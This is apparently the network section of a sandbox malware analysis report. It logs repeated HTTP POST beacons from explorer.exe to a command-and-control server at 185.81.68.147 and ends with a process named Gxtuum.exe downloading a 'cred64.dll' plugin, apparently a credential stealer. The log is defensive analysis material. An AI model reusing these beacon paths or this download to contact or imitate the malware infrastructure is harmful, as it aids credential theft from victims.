                                                                                                                                                                                                Dec 13, 2024 08:19:30.023195028 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:30.143069983 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:31.467072964 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:30 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                21192.168.2.1149837185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:31.696876049 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:31.816808939 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:33.167763948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:32 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                22192.168.2.1149843185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:33.448724031 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:33.568599939 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:34.928484917 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:34 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                23192.168.2.1149848185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:35.164915085 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:35.285150051 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:36.796763897 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:35 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                24192.168.2.1149854185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:37.195400953 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:37.315805912 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:38.826874971 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:37 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                25192.168.2.1149861185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:39.073646069 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:39.193479061 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:40.733407021 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:39 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                26192.168.2.1149867185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:40.960555077 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:41.080892086 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:42.574011087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:41 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                27192.168.2.1149873185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:42.804467916 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:42.924310923 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:44.261926889 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:43 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                28192.168.2.1149875185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:44.494002104 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:44.615000963 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:46.104569912 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:45 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                29192.168.2.1149880185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:46.335777044 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:46.455569983 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:47.786043882 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:46 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                30192.168.2.1149886185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:48.061122894 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:48.180886984 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:49.698792934 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:48 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                31192.168.2.1149892185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:49.929240942 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:50.049201012 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:51.539170980 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:50 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                32192.168.2.1149898185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:51.773179054 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:51.893001080 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:53.417124033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:52 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                33192.168.2.1149904185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:53.650963068 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:53.770747900 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:55.098115921 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:54 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                34192.168.2.1149905185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:55.335654974 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:55.455348015 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:56.791726112 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:55 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                35192.168.2.1149911185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:57.023049116 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:57.142934084 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:58.460819960 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                36192.168.2.1149917185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:58.733786106 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:58.856148958 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:00.374104977 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:59 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                37192.168.2.1149923185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:00.603835106 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:00.724796057 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:02.051659107 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:01 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                38192.168.2.1149925185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:02.288397074 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:02.408114910 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:03.729346037 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:02 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                39192.168.2.1149930185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:03.960536003 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:04.080507994 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:05.421852112 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:04 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                40192.168.2.1149936185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:05.648298025 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:05.768138885 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:07.258137941 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:06 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                41192.168.2.1149938185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:05.962958097 CET66OUTGET /7vhfjke3/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.276977062 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:06 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
